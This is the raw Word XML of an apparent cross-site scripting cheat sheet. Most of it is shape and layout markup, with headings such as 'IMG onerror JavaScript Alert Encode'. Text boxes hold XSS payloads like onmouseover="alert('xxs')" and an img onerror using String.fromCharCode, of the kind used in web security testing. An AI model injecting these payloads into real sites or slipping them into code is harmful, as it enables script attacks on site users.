                              <a:gd name="T0" fmla="+- 0 4789 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3196"/>
                              <a:gd name="T2" fmla="+- 0 436 254"/>
                              <a:gd name="T3" fmla="*/ 436 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3196"/>
                              <a:gd name="T6" fmla="+- 0 436 254"/>
                              <a:gd name="T7" fmla="*/ 436 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3196"/>
                              <a:gd name="T10" fmla="+- 0 436 254"/>
                              <a:gd name="T11" fmla="*/ 436 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3196"/>
                              <a:gd name="T14" fmla="+- 0 415 254"/>
                              <a:gd name="T15" fmla="*/ 415 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3196"/>
                              <a:gd name="T18" fmla="+- 0 412 254"/>
                              <a:gd name="T19" fmla="*/ 412 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3196"/>
                              <a:gd name="T22" fmla="+- 0 275 254"/>
                              <a:gd name="T23" fmla="*/ 275 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3196"/>
                              <a:gd name="T26" fmla="+- 0 254 254"/>
                              <a:gd name="T27" fmla="*/ 254 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4789 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3196"/>
                              <a:gd name="T30" fmla="+- 0 254 254"/>
                              <a:gd name="T31" fmla="*/ 254 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4810 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3196"/>
                              <a:gd name="T34" fmla="+- 0 275 254"/>
                              <a:gd name="T35" fmla="*/ 275 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4810 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3196"/>
                              <a:gd name="T38" fmla="+- 0 415 254"/>
                              <a:gd name="T39" fmla="*/ 415 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4792 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3196"/>
                              <a:gd name="T42" fmla="+- 0 436 254"/>
                              <a:gd name="T43" fmla="*/ 436 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4789 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3196"/>
                              <a:gd name="T46" fmla="+- 0 436 254"/>
                              <a:gd name="T47" fmla="*/ 4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196" h="183">
                                <a:moveTo>
                                  <a:pt x="317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175" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3196" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3196" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3178" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="317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3"/>
                            <a:ext cx="319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onmouseover="alert('xxs')"&gt;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2" o:spid="_x0000_s1074" style="position:absolute;margin-left:80.7pt;margin-top:12.7pt;width:159.8pt;height:9.15pt;z-index:-15721472;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,254" coordsize="319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">
                <v:shape id="Freeform 1364" o:spid="_x0000_s1075" style="position:absolute;left:1614;top:253;width:3196;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="319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h+W8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP22rCQBB9F/oPywi+6UYF0egqNqUilBa8gK9jdkyC&#10;2dmQXWPs17tCoW9zONdZrFpTioZqV1hWMBxEIIhTqwvOFBwPn/0pCOeRNZaWScGDHKyWb50Fxtre&#10;eUfN3mcihLCLUUHufRVL6dKcDLqBrYgDd7G1QR9gnUld4z2Em1KOomgiDRYcGnKsKMkpve5vRsHp&#10;a3ppfvUsOdqf8ff1/HhPPjY7pXrddj0H4an1/+I/91aH+ePJCF7fhBP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oflvEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3175,182l21,182r-3,l,161r,-3l,21,21,,3175,r21,21l3196,161r-18,21l3175,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3175,436;21,436;18,436;0,415;0,412;0,275;21,254;3175,254;3196,275;3196,415;3178,436;3175,436" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1363" o:spid="_x0000_s1076" type="#_x0000_t202" style="position:absolute;left:1614;top:253;width:319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B7E8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflin0VjdWCDW6EZEWCkIxxkOP0+wk&#10;WczOxuxW47/vCgVv83ifs1yNthNnGrxxrGA6SUAQV04bbhQcyo+XNxA+IGvsHJOCK3lY5Y8PS8y0&#10;u3BB531oRAxhn6GCNoQ+k9JXLVn0E9cTR652g8UQ4dBIPeAlhttOviZJKi0ajg0t9rRpqTruf62C&#10;9TcX7+b09bMr6sKU5TzhbXpU6vlpXC9ABBrDXfzv/tRx/iydwe2beIL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wexP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4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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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onmouseover="alert('xxs')"&gt;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1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SRC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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Leaving</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Entirely</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10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160655</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1759585" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1358" name="Group 1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9585" cy="116205"/>
                          <a:chOff x="1614" y="253"/>
                          <a:chExt cx="2771" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1359" name="Freeform 1361"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="253"/>
                            <a:ext cx="2771" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4364 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2771"/>
                              <a:gd name="T2" fmla="+- 0 435 253"/>
                              <a:gd name="T3" fmla="*/ 435 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2771"/>
                              <a:gd name="T6" fmla="+- 0 435 253"/>
                              <a:gd name="T7" fmla="*/ 435 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2771"/>
                              <a:gd name="T10" fmla="+- 0 435 253"/>
                              <a:gd name="T11" fmla="*/ 435 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2771"/>
                              <a:gd name="T14" fmla="+- 0 414 253"/>
                              <a:gd name="T15" fmla="*/ 414 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2771"/>
                              <a:gd name="T18" fmla="+- 0 411 253"/>
                              <a:gd name="T19" fmla="*/ 411 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2771"/>
                              <a:gd name="T22" fmla="+- 0 274 253"/>
                              <a:gd name="T23" fmla="*/ 274 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2771"/>
                              <a:gd name="T26" fmla="+- 0 253 253"/>
                              <a:gd name="T27" fmla="*/ 253 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4364 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2771"/>
                              <a:gd name="T30" fmla="+- 0 253 253"/>
                              <a:gd name="T31" fmla="*/ 253 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4385 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2771"/>
                              <a:gd name="T34" fmla="+- 0 274 253"/>
                              <a:gd name="T35" fmla="*/ 274 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4385 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2771"/>
                              <a:gd name="T38" fmla="+- 0 414 253"/>
                              <a:gd name="T39" fmla="*/ 414 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4367 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2771"/>
                              <a:gd name="T42" fmla="+- 0 435 253"/>
                              <a:gd name="T43" fmla="*/ 435 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4364 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2771"/>
                              <a:gd name="T46" fmla="+- 0 435 253"/>
                              <a:gd name="T47" fmla="*/ 43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771" h="183">
                                <a:moveTo>
                                  <a:pt x="275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750" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2771" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2771" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2753" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="275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" name="Text Box 1360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3"/>
                            <a:ext cx="277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4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onmouseover="alert('xxs')"&gt;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59" o:spid="_x0000_s1077" style="position:absolute;margin-left:80.7pt;margin-top:12.65pt;width:138.55pt;height:9.15pt;z-index:-15720960;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,253" coordsize="277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">
                <v:shape id="Freeform 1361" o:spid="_x0000_s1078" style="position:absolute;left:1614;top:253;width:2771;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="277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08bsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflil4000rlja6SgmEihdrWhFvQ3bM&#10;BrOzIbtq/PeuIPQ2j/c5s0VvG3GmzteOFbyOEhDEpdM1Vwr+fvPhBwgfkDU2jknBlTws5s9PM0y1&#10;u/CGzkWoRAxhn6ICE0KbSulLQxb9yLXEkTu4zmKIsKuk7vASw20j35LkXVqsOTYYbCkzVB6Lk1Ww&#10;WxdHU2ac71fZlvJdTz/fnpQavPRfUxCB+vAvfriXOs4fTz7h/k08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08bsMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m2750,182l21,182r-3,l,161r,-3l,21,21,,2750,r21,21l2771,161r-18,21l2750,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2750,435;21,435;18,435;0,414;0,411;0,274;21,253;2750,253;2771,274;2771,414;2753,435;2750,435" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1360" o:spid="_x0000_s1079" type="#_x0000_t202" style="position:absolute;left:1614;top:253;width:277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LlZMcA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF70L/wzIFb7pphVBTV5FioVCQxvTQ4zQ7&#10;JovZ2ZjdavrvnUOhtxnem/e+WW1G36kLDdEFNvAwz0AR18E6bgx8Vq+zJ1AxIVvsApOBX4qwWd9N&#10;VljYcOWSLofUKAnhWKCBNqW+0DrWLXmM89ATi3YMg8ck69BoO+BVwn2nH7Ms1x4dS0OLPb20VJ8O&#10;P97A9ovLnTvvvz/KY+mqapnxe34yZno/bp9BJRrTv/nv+s0K/iIXfvlGRt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i5WTHAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACM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64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onmouseover="alert('xxs')"&gt;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rPr>
          <w:sz w:val="17"/>
        </w:rPr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EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="91"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>On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Alert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3472180" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1355" name="Group 1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2180" cy="116205"/>
                          <a:chOff x="1614" y="242"/>
                          <a:chExt cx="5468" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1356" name="Freeform 1358"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="241"/>
                            <a:ext cx="5468" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7061 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 5468"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 5468"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 5468"/>
                              <a:gd name="T10" fmla="+- 0 423 242"/>
                              <a:gd name="T11" fmla="*/ 423 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 5468"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 5468"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 5468"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 5468"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7061 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 5468"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7082 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 5468"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7082 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 5468"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7064 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 5468"/>
                              <a:gd name="T42" fmla="+- 0 423 242"/>
                              <a:gd name="T43" fmla="*/ 423 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7061 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 5468"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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468" h="183">
                                <a:moveTo>
                                  <a:pt x="5447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447" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5468" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5468" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5450" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="544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" name="Text Box 135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1"/>
                            <a:ext cx="546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SRC=/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onerror="alert(String.fromCharCode(88,83,83))"&gt;&lt;/img&gt;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56" o:spid="_x0000_s1080" style="position:absolute;margin-left:80.7pt;margin-top:12.1pt;width:273.4pt;height:9.15pt;z-index:-15718400;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,242" coordsize="5468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">
                <v:shape id="Freeform 1358" o:spid="_x0000_s1081" style="position:absolute;left:1614;top:241;width:5468;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="546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E4HMUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP30vDMBB+F/wfwgm+bYmOTanLhhYFGexhcwi+Hc3Z&#10;FpNLadKu3V+/DAa+3cf385brwVnRUxtqzxoepgoEceFNzaWGw9fH5BlEiMgGrWfSMFKA9er2ZomZ&#10;8UfeUb+PpUghHDLUUMXYZFKGoiKHYeob4sT9+tZhTLAtpWnxmMKdlY9KLaTDmlNDhQ3lFRV/+85p&#10;eB9V332/8SY/zbaqOzzZnzG3Wt/fDa8vICIN8V98dX+aNH82X8Dlm3SCXJ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cTgcxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m5447,182l21,182r-3,-1l,161r,-3l,21,21,,5447,r21,21l5468,161r-18,20l5447,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5447,424;21,424;18,423;0,403;0,400;0,263;21,242;5447,242;5468,263;5468,403;5450,423;5447,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1357" o:spid="_x0000_s1082" type="#_x0000_t202" style="position:absolute;left:1614;top:241;width:5468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e3rcQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywje6kalaqOrSKlQEIoxPfQ4zY7J&#10;YnY2ZleN/75bKHibx/uc5bqztbhS641jBaNhAoK4cNpwqeAr3z7PQfiArLF2TAru5GG96j0tMdXu&#10;xhldD6EUMYR9igqqEJpUSl9UZNEPXUMcuaNrLYYI21LqFm8x3NZynCRTadFwbKiwobeKitPhYhVs&#10;vjl7N+fPn312zEyevya8m56UGvS7zQJEoC48xP/uDx3nT15m8PdNP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nt63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7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SRC=/</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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onerror="alert(String.fromCharCode(88,83,83))"&gt;&lt;/img&gt;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spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>IMG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>onerror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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Alert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Encode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1352" name="Group 1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614" y="242"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1353" name="Freeform 1355"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="241"/>
                            <a:ext cx="997" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2590 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 997"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 424 242"/>
                              <a:gd name="T11" fmla="*/ 424 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2590 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2611 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2611 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2593 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 424 242"/>
                              <a:gd name="T43" fmla="*/ 424 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2590 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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4" name="Text Box 1354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1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2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src=x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53" o:spid="_x0000_s1083" style="position:absolute;margin-left:80.7pt;margin-top:12.1pt;width:49.85pt;height:9.15pt;z-index:-15717888;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,242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">
                <v:shape id="Freeform 1355" o:spid="_x0000_s1084" style="position:absolute;left:1614;top:241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qyMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+C/0PyxS8FN1osGjMKlIRPLSFWr2P2ckD&#10;s7NpdqPpv+8KBW/z8T0nXfemFldqXWVZwWQcgSDOrK64UHD83o3mIJxH1lhbJgW/5GC9ehqkmGh7&#10;4y+6HnwhQgi7BBWU3jeJlC4ryaAb24Y4cLltDfoA20LqFm8h3NRyGkWv0mDFoaHEht5Kyi6Hzij4&#10;+FnI7ba+bF4+3/POdefTOdYTpYbP/WYJwlPvH+J/916H+fEshvs34QS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Z6sjEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,424;21,424;18,424;0,403;0,400;0,263;21,242;976,242;997,263;997,403;979,424;976,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1354" o:spid="_x0000_s1085" type="#_x0000_t202" style="position:absolute;left:1614;top:241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Up2sQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+C/0PyxR6000fiqauIlJBEKQxHjxOs2Oy&#10;mJ2N2a2m/94VhN7m43vOdN7ZWlyo9caxgtdBAoK4cNpwqWCfr/pjED4ga6wdk4I/8jCfPfWmmGp3&#10;5Ywuu1CKGMI+RQVVCE0qpS8qsugHriGO3NG1FkOEbSl1i9cYbmv5liQjadFwbKiwoWVFxWn3axUs&#10;Dpx9mfP25zs7ZibPJwlvRielXp67xSeIQF34Fz/cax3nvw8/4P5NPEH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1Kdr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-12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src=x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8"/>
        <w:rPr>
          <w:sz w:val="4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5563235" cy="116205"/>
                <wp:effectExtent l="5715" t="5715" r="3175" b="1905"/>
                <wp:docPr id="1349" name="Group 1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3235" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8761" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1350" name="Freeform 135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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 8761"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 8761"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 8761"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 8761"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 8761"/>
